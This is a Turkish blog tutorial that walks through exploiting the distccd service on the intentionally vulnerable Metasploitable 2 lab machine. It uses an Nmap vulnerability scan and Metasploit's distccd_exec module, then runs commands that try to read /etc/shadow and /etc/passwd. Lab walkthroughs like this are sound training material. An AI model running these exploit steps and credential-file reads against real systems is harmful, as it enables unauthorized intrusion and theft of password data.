MSF distccd_exec İstismar Modülü ile Uygulama Zafiyetinin İstismar Edilerek Meterpreter Bağlantısının Elde Edilmesi

0
15
views
Sızma testleri sırasında tespit edilen zafiyetlerin istismarı ile hedef sistemlerde bir takım yetkiler elde edilebilir. Bu yazıda, Metasploitable 2 üzerindeki distccd deoman’ına ait zafiyet istismar edilecek ve kullanıcı hakları ile Meterpreter bağlantısı elde edilecektir.

 

Not: Benzer zafiyet VulnOS: 1 sanal makinesinde de bulunmaktadır. VulnOS: 1 sanal makinesi Vulnhub sitesinden indirilebilir.

https://www.vulnhub.com/entry/vulnos-1,60/

IP adresi 100.100.200.7 olan Metasploitable 2, Nmap ile taratıldığında TCP 3632. portta distccd’in hizmet verdiği görülmektedir.

acquiring-meterpreter-shell-on-linux-by-using-msf-distccd-exec-exploit-module-01

 

Distccd servisine ait zafiyetler Nmap’in betikleri ile bulunabilmiştir.

nmap 100.100.200.7 -p 3632 -Pn -n –script vuln

acquiring-meterpreter-shell-on-linux-by-using-msf-distccd-exec-exploit-module-02

 

Bunun yanında CVE detayları da aşağıdaki gibidir.

acquiring-meterpreter-shell-on-linux-by-using-msf-distccd-exec-exploit-module-03

 

İstismar işlemi için Metaplosploit Framework içerisindeki distccd_exec istismar modülü kullanılabilir.

search distccd
use exploit/unix/misc/distccd_exec
show options

acquiring-meterpreter-shell-on-linux-by-using-msf-distccd-exec-exploit-module-04

 

MSF modülüne hedef sistemin IP adresi verilerek istismar işlemi gerçekleştirilebilir.

set RHOST 100.100.200.7
exploit
whoami
cat /etc/shadow
cat /etc/passwd

acquiring-meterpreter-shell-on-linux-by-using-msf-distccd-exec-exploit-module-05

 

Servisi çalıştıran hesap (daemon) yetkileri az olduğu için /etc/shadow dosyasını okuyamamıştır.

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz